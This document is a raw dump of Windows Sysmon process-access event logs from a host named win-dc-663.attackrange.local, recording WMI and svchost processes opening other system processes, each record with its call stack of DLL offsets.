|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025910Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025909Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025908Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025907Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025906Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025905Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\S
ystem32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025904Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025903Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000025902Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025901Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000025900Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025899Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9F2B-60D3-C600-00000000CF01}4680C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025898Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025897Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9F2B-60D3-C300-00000000CF01}4216C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\W
21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025861Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DEA-60D3-2700-00000000CF01}2896C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025860Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DEA-60D3-2500-00000000CF01}2788C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025859Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DE7-60D3-2300-00000000CF01}2624C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025858Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DE3-60D3-2200-00000000CF01}2548C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025857Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DE3-60D3-2100-00000000CF01}2540C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025856Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDE-60D3-1F00-00000000CF01}2128C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025855Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDE-60D3-1700-00000000CF01}1408C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\